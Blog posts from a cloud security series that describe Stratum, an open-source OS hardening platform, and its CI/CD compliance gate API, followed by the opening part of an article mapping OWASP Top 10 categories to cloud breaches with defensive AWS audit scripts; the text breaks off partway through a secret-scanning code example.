Stratum — OS Hardening as a Platform

Reading Time: 5 minutes

OS Hardening as Code, Episode 6
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening · Automated OpenSCAP Compliance · CI/CD Compliance Gate · Stratum Platform


TL;DR

  • Stratum is open-source under Apache 2.0 — the engine, blueprint format, scanner, and Pipeline API are all available on GitHub
  • The platform follows the same open-core model as Terraform/OpenTofu and Cilium/Isovalent: OSS core, self-hostable, extendable
  • Three extension points: custom compliance controls, provider plugins (add new cloud providers), pipeline integrations
  • Architecture: Blueprint YAML → Engine → Provider Layer → Ansible-Lockdown → OpenSCAP → Golden Image → Pipeline API
  • The series taught the user-facing interface for five episodes; EP06 covers what’s underneath and how to build on it
  • Installation is a single helm install or docker compose up — the platform runs in your environment

The Series Arc, Inverted

EP01 showed that default cloud AMIs arrive pre-broken. By the time you reach EP06, that problem has a complete solution:

EP01 — The problem:
  Default AMI → Production → Security audit finds gaps
  (unknown OS baseline, unverified hardening, no evidence)

EP06 — The solution:
  HardeningBlueprint YAML
           ↓
    stratum build          ← EP02 (blueprint as code)
    --provider aws,gcp     ← EP03 (multi-cloud)
           ↓
    OpenSCAP scan          ← EP04 (compliance grading)
    Grade: A (94/100)
           ↓
    POST /api/pipeline/scan ← EP05 (CI/CD gate)
    Result: pass
           ↓
    Production deployment
    (Grade A, SARIF attached, blueprint version-controlled)

For five episodes, you’ve used Stratum as a user. This episode covers what it looks like to run it yourself, extend it, and build on it.


I’ve spent years watching infrastructure teams solve the same OS hardening problem in slightly different ways. Custom scripts that drift. OpenSCAP runs that produce evidence no one reads. Compliance checklists completed by humans who have competing priorities.

The tools exist. ansible-lockdown applies CIS controls reliably. OpenSCAP verifies them accurately. The CI/CD systems can enforce anything you can express as a pass/fail. The gap isn’t the tooling — it’s the integration layer that ties them together into a reproducible, auditable pipeline.

Stratum is that integration layer, open-sourced.

The philosophy is the same as Terraform applied to OS security posture: declare the desired state in a version-controlled file, apply it reproducibly, and verify it automatically. The skip-at-2am problem disappears not because engineers are more careful, but because there’s no step to skip.


The Architecture

┌─────────────────────────────────────────────────────────┐
│                 HardeningBlueprint YAML                  │
│         (version-controlled, provider-agnostic)          │
└─────────────────────┬───────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────────────────┐
│                   Stratum Engine                         │
│                  (Apache 2.0, OSS)                       │
│  ┌─────────────┐  ┌──────────────┐  ┌────────────────┐  │
│  │  Blueprint  │  │   Provider   │  │    Scheduler   │  │
│  │   Parser    │  │    Layer     │  │  (parallel     │  │
│  │             │  │  AWS  GCP    │  │   multi-cloud  │  │
│  │  Validates  │  │  Azure DO    │  │   builds)      │  │
│  │  schema +   │  │  Linode      │  │                │  │
│  │  overrides  │  │  Proxmox     │  │                │  │
│  └─────────────┘  └──────────────┘  └────────────────┘  │
└─────────────────────┬───────────────────────────────────┘
                      │
           ┌──────────┴──────────┐
           ▼                     ▼
  ┌─────────────────┐   ┌─────────────────┐
  │ Ansible-Lockdown │   │  OpenSCAP       │
  │  Runner          │   │  Scanner        │
  │                  │   │                 │
  │  UBUNTU22-CIS    │   │  A-F grade      │
  │  RHEL8-STIG      │   │  SARIF export   │
  │  Custom roles    │   │  Drift detect   │
  └────────┬─────────┘   └────────┬────────┘
           │                      │
           └──────────┬───────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Golden Image          │
         │   (AMI / GCP / Azure)   │
         │   + compliance metadata │
         └────────────┬────────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Pipeline API          │
         │   (Apache 2.0, OSS)     │
         │                         │
         │  POST /api/pipeline/scan │
         │  ← CI/CD gate           │
         └─────────────────────────┘

Every component is open-source under Apache 2.0. The engine, provider layer, Ansible runner, OpenSCAP scanner, and Pipeline API are all in the repository. Nothing is locked to a hosted service.


Installation

Stratum runs as a set of containers. Kubernetes or Docker Compose both work.

Kubernetes (Helm):

# Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Install Stratum in your cluster using the bundled Helm chart
helm install stratum ./deploy/helm/stratum \
  --namespace stratum-system \
  --create-namespace \
  --set config.providers.aws.enabled=true \
  --set config.providers.gcp.enabled=true \
  --set config.storageClass=standard

# Verify
kubectl get pods -n stratum-system
# NAME                          READY   STATUS    RESTARTS   AGE
# stratum-engine-0              1/1     Running   0          2m
# stratum-scanner-7d9b4-abc12   1/1     Running   0          2m
# stratum-api-6c8f5-def34       1/1     Running   0          2m

Docker Compose (single-node):

# Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Configure providers
cp config/providers.example.yaml config/providers.yaml
vim config/providers.yaml  # add AWS/GCP/Azure credentials

# Start
docker compose up -d

# Stratum is available at http://localhost:8080

The Three Extension Points

1. Custom Compliance Controls

Add controls that aren’t in the CIS benchmark — internal policies, org-specific security requirements, or controls from other frameworks:

# controls/custom-audit-policy.yaml
id: CUSTOM-001
title: Audit logging retention must be 90 days
description: All instances must retain audit logs for 90 days minimum
severity: high
benchmark: custom
check:
  type: command
  command: "grep -E '^max_log_file_action' /etc/audit/auditd.conf"
  expected: "max_log_file_action = keep_logs"
remediation:
  type: ansible
  task: |
    - name: Configure audit log retention
      lineinfile:
        path: /etc/audit/auditd.conf
        regexp: '^max_log_file_action'
        line: 'max_log_file_action = keep_logs'

Deploy the custom control:

stratum controls deploy --file controls/custom-audit-policy.yaml

Reference it in any blueprint:

compliance:
  benchmark: cis-l1
  controls: all
  additional_controls:
    - CUSTOM-001

Custom controls appear in the grade calculation and SARIF output alongside CIS controls.
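
A command-type check like CUSTOM-001 boils down to "run a command, compare its output with the expected value". The sketch below shows one way such an evaluator might work. It is not Stratum's implementation: the function names, the injectable run callable, and the whitespace normalization are all assumptions made for illustration.

```python
import subprocess
from typing import Callable


def run_shell(command: str) -> str:
    """Run a command through the shell and return its stdout."""
    completed = subprocess.run(
        command, shell=True, capture_output=True, text=True, check=False
    )
    return completed.stdout


def evaluate_command_check(check: dict, run: Callable[[str], str] = run_shell) -> bool:
    """Return True when some output line equals the control's `expected` value.

    Whitespace is normalized so 'a = b' and 'a  =  b' compare equal
    (an assumption; a real engine may compare differently).
    """
    if check.get("type") != "command":
        raise ValueError("this sketch only handles type: command")
    expected = " ".join(check["expected"].split())
    output = run(check["command"])
    return any(" ".join(line.split()) == expected for line in output.splitlines())


# Usage with a fake runner, so no auditd.conf is needed to try it out
check = {
    "type": "command",
    "command": "grep -E '^max_log_file_action' /etc/audit/auditd.conf",
    "expected": "max_log_file_action = keep_logs",
}
print(evaluate_command_check(check, run=lambda _cmd: "max_log_file_action = keep_logs\n"))
```

Injecting the runner keeps the comparison logic testable without touching the host, which is handy when iterating on a new control definition.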

2. Provider Plugins

Add support for a new cloud provider by implementing the provider interface:

# providers/custom_provider.py
from stratum.providers import BaseProvider

class CustomProvider(BaseProvider):
    name = "my-cloud"

    def provision_build_instance(self, blueprint, config):
        # Launch a build instance on your cloud
        # Return: instance_id, connection_details
        ...

    def create_image(self, instance_id, blueprint, grade):
        # Snapshot the instance into an image
        # Tag with compliance metadata
        # Return: image_id
        ...

    def terminate_instance(self, instance_id):
        # Clean up the build instance
        ...

Register the plugin:

stratum providers register --file providers/custom_provider.py --name my-cloud

The provider is now available as --provider my-cloud in all stratum build commands.
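
The three methods map onto a provision, snapshot, clean-up lifecycle. The sketch below shows how an engine might drive a plugin through that lifecycle and how a fake provider can be used to test the wiring. The local BaseProvider is a stand-in so the example runs without Stratum installed, and build_image, harden_and_scan, and InMemoryProvider are hypothetical names, not part of the project.

```python
from abc import ABC, abstractmethod


class BaseProvider(ABC):
    """Stand-in for stratum.providers.BaseProvider so the sketch runs alone."""

    name = "base"

    @abstractmethod
    def provision_build_instance(self, blueprint, config): ...

    @abstractmethod
    def create_image(self, instance_id, blueprint, grade): ...

    @abstractmethod
    def terminate_instance(self, instance_id): ...


def build_image(provider, blueprint, config, harden_and_scan):
    """Provision, harden, snapshot, and always clean up the build instance.

    `harden_and_scan` is a hypothetical callable that applies the blueprint
    over the connection details and returns a grade such as "A".
    """
    instance_id, connection = provider.provision_build_instance(blueprint, config)
    try:
        grade = harden_and_scan(connection, blueprint)
        return provider.create_image(instance_id, blueprint, grade)
    finally:
        # Runs on success and on failure, so build instances are not leaked.
        provider.terminate_instance(instance_id)


class InMemoryProvider(BaseProvider):
    """Fake provider that records calls instead of talking to a cloud."""

    name = "my-cloud"

    def __init__(self):
        self.calls = []

    def provision_build_instance(self, blueprint, config):
        self.calls.append("provision")
        return "inst-1", {"host": "192.0.2.10"}

    def create_image(self, instance_id, blueprint, grade):
        self.calls.append("create_image")
        return f"img-{instance_id}-{grade}"

    def terminate_instance(self, instance_id):
        self.calls.append("terminate")


provider = InMemoryProvider()
print(build_image(provider, {}, {}, lambda conn, bp: "A"), provider.calls)
```

Putting terminate_instance in a finally block is the design choice worth copying: a failed scan should never leave a billable build instance running.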

3. Pipeline Integrations

Beyond the curl-based API, Stratum provides a webhook system that fires on build completion, scan results, and gate failures:

# Webhook configuration
notifications:
  - event: pipeline_gate_failure
    webhook: https://hooks.slack.com/...
    template: |
      Image {{ image_id }} failed compliance gate.
      Grade: {{ grade }} (required: {{ min_grade }})
      Top failing controls:
      {% for control in failing_controls[:3] %}
      - {{ control.id }}: {{ control.title }}
      {% endfor %}

  - event: build_complete
    webhook: https://jira.yourdomain.com/api/...
    template: |
      New image built: {{ image_id }}
      Blueprint: {{ blueprint_name }}@{{ blueprint_version }}
      Grade: {{ grade }}

The Open-Core Model

Stratum follows the same model as the tools that have become infrastructure standards:

Tool                  | Open-core model
----------------------+--------------------------------------------------------
Terraform / OpenTofu  | Core OSS, enterprise features in paid tier
Cilium / Isovalent    | Core OSS, enterprise support/features in paid tier
Vault / HCP Vault     | Core OSS, hosted/enterprise in paid tier
Stratum               | Engine + blueprint + scanner + Pipeline API: Apache 2.0

Everything taught in this series — the blueprint format, the build pipeline, the compliance grading, the CI/CD gate — is in the OSS core. You can self-host it, extend it, contribute to it, and run it in your own infrastructure without any dependency on a hosted service.

The repository is at: github.com/rrskris/Stratum


What This Series Taught

EP01 — EP06 in one view:

Episode | What you learned                                  | What Stratum does
--------+---------------------------------------------------+-----------------------------------------------------------
EP01    | Default AMIs are insecure by design               | Replaces default AMI with a hardened golden image
EP02    | Blueprint as code: the 2am skip disappears        | HardeningBlueprint YAML: 5-step wizard or direct YAML
EP03    | One blueprint, six providers, no drift            | 6 providers: AWS, GCP, Azure, DigitalOcean, Linode, Proxmox
EP04    | Automated OpenSCAP: grade at build time           | Compliance Scanner: A-F, SARIF, drift detection
EP05    | CI/CD gate: the unhardened image never deploys    | Pipeline API: POST /api/pipeline/scan
EP06    | The platform: OSS, self-hostable, extendable      | Apache 2.0, Helm install, three extension points

What’s Next

This series closes the OS hardening gap. The same principle — declare desired state, build reproducibly, verify automatically — applies to every layer of your infrastructure.

If you’ve been following the eBPF: From Kernel to Cloud series, EP10 covers what happens when you combine kernel-level observability with the hardened base that Stratum provides: every connection, every process spawn, every file access — visible from the host kernel, on an OS baseline you can verify.

The next series: Purple Team Playbook — real attack paths against cloud and Kubernetes infrastructure, how they’re detected, and how they’re closed. Starting May 8.

GitHub: github.com/rrskris/Stratum


The Pipeline Gate — Hardened Images as a CI/CD Build Constraint

Reading Time: 6 minutes

OS Hardening as Code, Episode 5
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening · Automated OpenSCAP Compliance · CI/CD Compliance Gate


TL;DR

  • A CI/CD compliance gate turns an OS hardening grade from a report into a build constraint — unhardened images fail the pipeline before they can be deployed
  • POST /api/pipeline/scan returns pass/fail against a minimum grade threshold — integrates into any CI/CD system that can make an HTTP request
  • Failed gate output tells engineers exactly which controls failed and what to fix — not just “blocked”
  • The gate works on both build-time grades (new images) and runtime grades (existing instances)
  • GitHub Actions, GitLab CI, Jenkins, and Tekton integrations are one curl command
  • The structural guarantee: an image that doesn’t pass the gate doesn’t exist in the deployment pipeline

The Problem: A Grade No One Checks Is Decoration

Pipeline without compliance gate:
  Build → Test → Security scan (results to dashboard) → Deploy

What actually happens:
  Build → Test → Security scan → "C grade, but we need to ship" → Deploy anyway
                                           │
                                           └─ Dashboard shows C grade
                                              Nobody is paged
                                              Deployment succeeds

A CI/CD compliance gate means the pipeline can’t continue if the grade is below threshold.

EP04 showed that automated OpenSCAP compliance gives every image a verified, reproducible grade before deployment. What it assumed is that someone checks the grade before deploying. They don’t — not under deadline pressure, not when the image has been “working fine for months,” not at 2am.

The same problem that made hardening runbooks skippable applies to compliance grades: if checking the grade is a discretionary step, it will be skipped.


A new microservice was deployed from an unhardened base image. The team had built it quickly during a sprint, used a community AMI as the base, and planned to harden it “in the next sprint.”

Three weeks later, a penetration test found it. SSH password authentication enabled. Three unnecessary services running — one of them with a known CVE. The finding: the instance had full inbound access from the VPC and was reachable from a compromised adjacent instance.

The deployment had gone through the normal CI/CD pipeline. Unit tests passed. Integration tests passed. A vulnerability scan ran. The scan produced a report that went to a dashboard. Nobody had a gate set up to fail the build if the image was unhardened.

The hardening work from the “next sprint” plan would have taken four hours. The pentest remediation took a week, plus the time to investigate what had been exposed during the three weeks the instance was running.

The CI/CD pipeline had every check except the one that would have caught the base image problem before the first deployment.


The Pipeline API

The Pipeline API is a single HTTP endpoint that takes an image or instance ID, checks it against a minimum grade, and returns pass or fail:

# Fail the pipeline if the image grade is below B
curl -sf -X POST https://stratum.yourdomain.com/api/pipeline/scan \
  -H "Authorization: Bearer ${STRATUM_TOKEN}" \
  -H "Content-Type: application/json" \
  -d '{
    "image_id": "ami-0a7f3c9e82d1b4c05",
    "min_grade": "B"
  }'

# Pass response (grade A):
# HTTP 200
# {
#   "result": "pass",
#   "image_id": "ami-0a7f3c9e82d1b4c05",
#   "grade": "A",
#   "score": 94,
#   "controls_passing": 94,
#   "controls_total": 100,
#   "scanned_at": "2026-04-19T15:54:10Z"
# }

# Fail response (grade C):
# HTTP 422
# {
#   "result": "fail",
#   "image_id": "ami-0c9d5e3f81a2b6e07",
#   "grade": "C",
#   "score": 72,
#   "min_grade_required": "B",
#   "failing_controls": [
#     { "id": "1.1.7", "title": "Separate partition for /var/log/audit", "severity": "high" },
#     { "id": "3.3.2", "title": "TCP SYN cookies enabled", "severity": "medium" },
#     ...
#   ]
# }

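A non-200 response fails the pipeline. curl’s -f flag makes it exit non-zero when the API returns an HTTP error such as 422, so the pipeline step exits non-zero and the job fails. The || { ...; exit 1; } in the GitHub Actions integration below only adds a readable message on top of that. Note that -f also discards the response body on errors; use --fail-with-body (curl 7.76.0 or later) if the failing controls should appear in the CI log.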
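
For pipelines that prefer a script over curl, the same gate can be sketched in Python with only the standard library. This is an illustration built on the request and response shapes shown above; interpret_scan_response and call_gate are hypothetical helper names, and error handling for non-JSON replies is left out.

```python
import json
import urllib.error
import urllib.request


def interpret_scan_response(status: int, body: dict) -> tuple[int, str]:
    """Map an HTTP status and JSON body to (exit_code, message)."""
    if status == 200 and body.get("result") == "pass":
        return 0, f"PASS {body.get('image_id')} grade {body.get('grade')}"
    lines = [
        f"FAIL {body.get('image_id')} grade {body.get('grade')} "
        f"(required {body.get('min_grade_required')})"
    ]
    for control in body.get("failing_controls", []):
        lines.append(f"  {control['severity'].upper():6} {control['id']} {control['title']}")
    return 1, "\n".join(lines)


def call_gate(base_url: str, token: str, image_id: str, min_grade: str) -> tuple[int, str]:
    """POST to /api/pipeline/scan and interpret the reply (makes a network call)."""
    request = urllib.request.Request(
        f"{base_url}/api/pipeline/scan",
        data=json.dumps({"image_id": image_id, "min_grade": min_grade}).encode(),
        headers={"Authorization": f"Bearer {token}", "Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(request) as response:
            return interpret_scan_response(response.status, json.load(response))
    except urllib.error.HTTPError as error:
        # urllib raises on 4xx/5xx; the 422 body still carries the failing controls.
        return interpret_scan_response(error.code, json.load(error))
```

A CI step would call call_gate, print the message, and pass the exit code to sys.exit. Unlike curl -sf, this keeps the failing controls visible in the job log.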


GitHub Actions Integration

# .github/workflows/deploy.yml

jobs:
  build-image:
    runs-on: ubuntu-latest
    outputs:
      ami_id: ${{ steps.build.outputs.ami_id }}
    steps:
      - name: Build hardened AMI
        id: build
        run: |
          AMI_ID=$(stratum build \
            --blueprint ubuntu22-cis-l1.yaml \
            --provider aws \
            --output json | jq -r '.image_id')
          echo "ami_id=${AMI_ID}" >> $GITHUB_OUTPUT

  compliance-gate:
    runs-on: ubuntu-latest
    needs: build-image
    steps:
      - name: Stratum compliance gate
        run: |
          curl -sf -X POST ${{ vars.STRATUM_URL }}/api/pipeline/scan \
            -H "Authorization: Bearer ${{ secrets.STRATUM_TOKEN }}" \
            -H "Content-Type: application/json" \
            -d "{\"image_id\": \"${{ needs.build-image.outputs.ami_id }}\", \"min_grade\": \"B\"}" \
            || { echo "Compliance gate failed — image does not meet minimum grade B"; exit 1; }

  deploy:
    runs-on: ubuntu-latest
    needs: [build-image, compliance-gate]
    steps:
      - name: Deploy to staging
        run: |
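          # An ASG launch template is referenced by name/ID and version, not by ImageId,
          # so publish a new template version with the AMI first.
          # "my-launch-template" is a placeholder for the template your ASG uses.
          aws ec2 create-launch-template-version \
            --launch-template-name my-launch-template \
            --source-version '$Latest' \
            --launch-template-data "{\"ImageId\":\"${{ needs.build-image.outputs.ami_id }}\"}"
          aws autoscaling update-auto-scaling-group \
            --auto-scaling-group-name my-asg \
            --launch-template 'LaunchTemplateName=my-launch-template,Version=$Latest'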

The deploy job only runs if compliance-gate passes. The AMI doesn’t reach the autoscaling group if it doesn’t meet the grade threshold.


GitLab CI Integration

# .gitlab-ci.yml

stages:
  - build
  - compliance
  - deploy

build-image:
  stage: build
  script:
    - |
      AMI_ID=$(stratum build \
        --blueprint ubuntu22-cis-l1.yaml \
        --provider aws \
        --output json | jq -r '.image_id')
      echo "AMI_ID=${AMI_ID}" >> build.env
  artifacts:
    reports:
      dotenv: build.env

compliance-gate:
  stage: compliance
  needs: [build-image]
  script:
    - |
      curl -sf -X POST ${STRATUM_URL}/api/pipeline/scan \
        -H "Authorization: Bearer ${STRATUM_TOKEN}" \
        -H "Content-Type: application/json" \
        -d "{\"image_id\": \"${AMI_ID}\", \"min_grade\": \"B\"}"

deploy:
  stage: deploy
  needs: [build-image, compliance-gate]
  script:
    - ./deploy.sh ${AMI_ID}

What the Failed Gate Tells You

The value of the CI/CD compliance gate is not just that it blocks bad images — it’s that the failure output tells engineers what to fix.

A gate failure in CI shows:

Compliance gate failed.

Image: ami-0c9d5e3f81a2b6e07
Grade: C (72/100)
Required: B (85/100)
Gap: 13 points below the required score

Failing controls:
  HIGH   1.1.7   Separate partition for /var/log/audit
                 Fix: Provision /var/log/audit on a separate EBS volume
  MEDIUM 1.6.1.3 AppArmor enabled in bootloader
                 Fix: Update GRUB_CMDLINE_LINUX, run update-grub, reboot
  MEDIUM 3.3.2   TCP SYN cookies
                 Fix: echo "net.ipv4.tcp_syncookies=1" > /etc/sysctl.d/60-cis.conf
  LOW    5.2.21  SSH MaxStartups
                 Fix: Add "MaxStartups 10:30:60" to /etc/ssh/sshd_config
  ...

View full scan report: https://stratum.yourdomain.com/scans/ami-0c9d5e3f81a2b6e07

This is not a wall — it’s a list of exactly what to fix. The engineer running the pipeline sees the gap, fixes the blueprint or the Ansible role, rebuilds, and the gate passes. The gap is closed before any instance is deployed.


Runtime Gate: Checking Existing Instances

The Pipeline API also works against running instances, not just images:

# Gate on a running instance's current compliance state
curl -sf -X POST https://stratum.yourdomain.com/api/pipeline/scan \
  -H "Authorization: Bearer ${STRATUM_TOKEN}" \
  -H "Content-Type: application/json" \
  -d '{
    "instance_id": "i-0abc123",
    "min_grade": "B",
    "scan_type": "runtime"
  }'

This is useful in deployment pipelines that don’t build custom AMIs — they launch instances and configure them after launch. The runtime gate runs after configuration is complete and before the instance is registered with the load balancer.

It also integrates into scheduled compliance jobs — scan your fleet on a schedule and alert when any instance drifts below grade threshold.


Grade Thresholds by Environment

Not all environments need the same threshold. A common pattern:

# Environment-specific minimum grades
environments:
  production: A      # 95%+ passing; no exceptions
  staging:    B      # 85%+ passing; minor gaps acceptable
  development: C     # 70%+ passing; experimental OK

# Production deploy gate
curl -sf -X POST .../api/pipeline/scan \
  -d '{"image_id": "ami-...", "min_grade": "A"}'

# Staging deploy gate
curl -sf -X POST .../api/pipeline/scan \
  -d '{"image_id": "ami-...", "min_grade": "B"}'

This lets development move fast with a lower bar while enforcing the highest standard at the production gate.
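
If the threshold lookup lives in a deploy script rather than in each curl call, it can be sketched as a small comparison on grade letters. The environment map comes from the pattern above; the grade ordering (A best, then B, C, D, F, with no E) and the function names are assumptions.

```python
GRADE_ORDER = "ABCDF"  # best to worst; assumes the A-F scale has no E grade

ENVIRONMENT_MIN_GRADE = {"production": "A", "staging": "B", "development": "C"}


def meets_threshold(grade: str, min_grade: str) -> bool:
    """True when `grade` is at least as good as `min_grade`."""
    return GRADE_ORDER.index(grade) <= GRADE_ORDER.index(min_grade)


def can_deploy(grade: str, environment: str) -> bool:
    """Look up the environment's minimum grade and compare."""
    return meets_threshold(grade, ENVIRONMENT_MIN_GRADE[environment])


for env in ("production", "staging", "development"):
    print(env, can_deploy("B", env))
```

Comparing letters instead of raw scores keeps the script independent of where the platform draws the score boundaries for each grade.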


Production Gotchas

Gate latency on first scan: If the image hasn’t been scanned yet, the Pipeline API triggers a scan on demand. This takes 2–3 minutes. For build pipelines that want instant gate results, use stratum build --blueprint ... --scan-on-build to ensure the scan runs during the build step and the result is cached for the gate call.

Token rotation: The STRATUM_TOKEN used for API authentication should be rotated on the same schedule as other service credentials. Use environment-specific tokens so a compromised staging token doesn’t bypass a production gate.

Webhook notifications on gate failure: The Pipeline API can send a webhook to Slack, PagerDuty, or any endpoint when a gate fails. Configure this for production pipelines so failures are visible beyond the CI log.

# In the Stratum config
notifications:
  pipeline_failures:
    - type: slack
      webhook: ${SLACK_WEBHOOK}
      channel: "#platform-security"
    - type: webhook
      url: ${PAGERDUTY_WEBHOOK}
      min_grade: D     # only page on D/F, not B/C failures

Key Takeaways

  • A CI/CD compliance gate turns a compliance grade from a dashboard metric into a pipeline constraint — the image doesn’t deploy if it doesn’t pass
  • POST /api/pipeline/scan is a single HTTP call that any CI/CD system can make — no agent, no plugin, no SDK required
  • Failed gate output is actionable: every failing control includes the specific fix, not just the control ID
  • Runtime gates check instances after configuration, not just at image build time
  • Environment-specific thresholds let development move faster while enforcing the highest standard at production

What’s Next

The CI/CD compliance gate closes the final gap: even if an unhardened image gets built, it can’t deploy. EP05 is the bookmark episode — this is the point where OS hardening becomes structurally enforced rather than procedurally expected.

EP06 is the series closer. For five episodes, you’ve been using Stratum as a user. What does it look like to run it yourself — extend it with a custom control, add a provider, deploy the platform in your own infrastructure?

Stratum is open-core (Apache 2.0). EP06 is the architecture reveal, the GitHub release, and the extension guide for everything the series taught.

Next: Stratum — open-source OS hardening platform for multi-cloud infrastructure


OWASP Top 10 Mapped to Cloud Infrastructure: Beyond Web Apps

Reading Time: 11 minutes

What is purple team security · OWASP Top 10 mapped to cloud infrastructure · EP03: Cloud security breaches 2020–2025


TL;DR

  • OWASP Top 10 cloud infrastructure mapping shows that every category has a direct cloud-native equivalent — this is not a web-app-only taxonomy
  • A01 Broken Access Control = IAM wildcards, public S3, overly permissive trust policies
  • A07 Authentication Failures = MFA fatigue, session token theft, push-notification abuse
  • A08 Software/Data Integrity = compromised build pipelines, unsigned container images, secrets in CI/CD
  • A10 SSRF = EC2 metadata endpoint abuse, IMDSv1 credential theft (the Capital One attack vector)
  • Every major cloud breach 2020–2025 lands in one of these ten categories — the taxonomy was always infrastructure-applicable

OWASP Mapping: All categories — A01 through A10. This episode is the reference map for the entire series.


The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│           OWASP TOP 10 → CLOUD INFRASTRUCTURE MAPPING              │
│                                                                     │
│  OWASP (2021)              CLOUD EQUIVALENT          REAL BREACH    │
│  ─────────────────────────────────────────────────────────────────  │
│  A01 Broken Access Ctrl  → IAM wildcards, public S3  Capital One    │
│  A02 Cryptographic Fail  → Plaintext secrets, weak   CircleCI       │
│                            KMS config                               │
│  A03 Injection           → Log4j JNDI, SSRF as       Log4Shell      │
│                            injection variant                        │
│  A04 Insecure Design     → --privileged containers   runc CVEs      │
│                            no seccomp/AppArmor                      │
│  A05 Security Misconfig  → K8s RBAC defaults, open   Multiple       │
│                            etcd ports                               │
│  A06 Vulnerable Comps    → Transitive deps, outdated  XZ Utils      │
│                            base images                              │
│  A07 Auth Failures       → MFA fatigue, stolen        Uber, Okta    │
│                            session tokens                           │
│  A08 SW/Data Integrity   → Unsigned artifacts,        SolarWinds    │
│                            compromised pipelines                    │
│  A09 Logging/Monitoring  → Missing CloudTrail,        Most          │
│                            no workload telemetry                    │
│  A10 SSRF                → EC2 IMDS abuse, metadata  Capital One    │
│                            credential theft                         │
└─────────────────────────────────────────────────────────────────────┘

OWASP Top 10 cloud infrastructure mapping is not a translation exercise — it is a recognition that the same classes of failure that compromise web applications also compromise cloud infrastructure, Kubernetes clusters, and CI/CD pipelines. The language shifts; the attack classes don’t.


Why Engineers Treat OWASP as a Web-App-Only Concern

I kept hearing OWASP Top 10 in web application security reviews. The AppSec team ran it through their checklist. The infrastructure team shrugged — “that’s for the developers.” Then I looked at the actual cloud breaches: Capital One, Uber, CircleCI, SolarWinds. Every one of them mapped to an OWASP category.

The confusion comes from OWASP’s origins. The project started in 2001 focused on web application vulnerabilities. SQL injection, XSS, broken authentication against HTTP endpoints. The cloud and container ecosystem didn’t exist. So the examples stayed web-application-centric even as the underlying failure classes proved universal.

The 2021 OWASP Top 10 update is more abstracted than its predecessors — intentionally. “Broken Access Control” doesn’t say “SQL injection.” It says access control. That applies to every IAM policy that has "Action": "*" where it shouldn’t.

This episode makes the mapping explicit. One OWASP category at a time.


A01: Broken Access Control — IAM Wildcards and Public S3

Web equivalent: A user can access other users’ records by modifying the URL parameter.

Cloud equivalent: An IAM role with "Action": "*" on "Resource": "*". An S3 bucket with public read. A cross-account trust policy that allows any principal in the account, not just a specific role.

Broken access control in cloud infrastructure means the principal can reach a resource it should not be able to reach, because the access control decision was not made or was made incorrectly.
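
The "Action": "*" on "Resource": "*" case is easy to check mechanically once a policy document is in hand. The sketch below is a minimal illustration, assuming the policy has already been loaded as a dict. It only catches the full wildcard pair, not service-level wildcards such as s3:* or NotAction statements, and wildcard_statements is a hypothetical helper name.

```python
def _as_list(value):
    """IAM allows a single value or a list; normalize to a list."""
    return value if isinstance(value, list) else [value]


def wildcard_statements(policy: dict) -> list[dict]:
    """Return Allow statements that grant every action on every resource."""
    flagged = []
    for statement in _as_list(policy.get("Statement", [])):
        if statement.get("Effect") != "Allow":
            continue
        actions = _as_list(statement.get("Action", []))
        resources = _as_list(statement.get("Resource", []))
        if "*" in actions and "*" in resources:
            flagged.append(statement)
    return flagged


policy = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "*", "Resource": "*"},
        {"Effect": "Allow", "Action": ["s3:GetObject"], "Resource": "*"},
    ],
}
print(len(wildcard_statements(policy)))
```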

The Capital One breach (2019, disclosed publicly) is the canonical example. A WAF running on EC2 had an IAM role attached. That role had permissions to list and retrieve objects from S3 buckets. SSRF against the WAF reached the EC2 metadata endpoint and retrieved the IAM role credentials. Those credentials then accessed 100 million customer records. The SSRF was A10. The fact that the WAF had access to customer data S3 buckets was A01.

# Check the account-level S3 Block Public Access settings
aws s3control get-public-access-block --account-id "$(aws sts get-caller-identity --query Account --output text)"

# Find buckets whose bucket-level block is missing or has any setting disabled
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read -r bucket; do
    result=$(aws s3api get-public-access-block --bucket "$bucket" 2>/dev/null)
    # An empty result means no bucket-level configuration exists at all
    if [ -z "$result" ] || echo "$result" | grep -q ': false'; then
      echo "PUBLIC ACCESS NOT FULLY BLOCKED: $bucket"
    fi
  done

A02: Cryptographic Failures — Plaintext Secrets and Weak KMS Config

Web equivalent: Passwords stored as MD5 hashes. Credit card numbers in plaintext in the database.

Cloud equivalent: DATABASE_URL=postgres://user:password@host/db in a .env file committed to a public repository. An S3 bucket with sensitive data where server-side encryption is not enforced. KMS key policies that allow kms:Decrypt to any principal in the account.

Cryptographic failures in the cloud are less about broken algorithms and more about secrets that aren’t secret. The CircleCI breach (January 2023) exposed customer secrets — API tokens, AWS credentials, private keys — that customers had stored in CircleCI’s environment variables. The attacker compromised CircleCI’s infrastructure and exfiltrated those secrets. The cryptographic failure was that secrets were stored in a way that could be exfiltrated when the platform was compromised, rather than being bound to hardware or using short-lived credentials that couldn’t be replayed.

# Check if default EBS encryption is enabled (prevents data at rest failures)
aws ec2 get-ebs-encryption-by-default --region us-east-1

# Check for S3 buckets without default encryption
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    enc=$(aws s3api get-bucket-encryption --bucket "$bucket" 2>/dev/null)
    if [ -z "$enc" ]; then
      echo "NO DEFAULT ENCRYPTION: $bucket"
    fi
  done
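
The committed .env case can be caught before it reaches a repository. The sketch below is a rough illustration, not a replacement for a real secret scanner: it flags variables whose value is a URL with an embedded password, such as the DATABASE_URL example in this section. The function name is hypothetical.

```python
from urllib.parse import urlsplit


def env_vars_with_embedded_passwords(text: str) -> list[str]:
    """Return names of variables whose value is a URL containing a password."""
    flagged = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        name, value = line.split("=", 1)
        value = value.strip().strip("'\"")
        if "://" not in value:
            continue
        try:
            parts = urlsplit(value)
        except ValueError:
            continue  # not a parseable URL; out of scope for this sketch
        if parts.password:
            flagged.append(name.strip())
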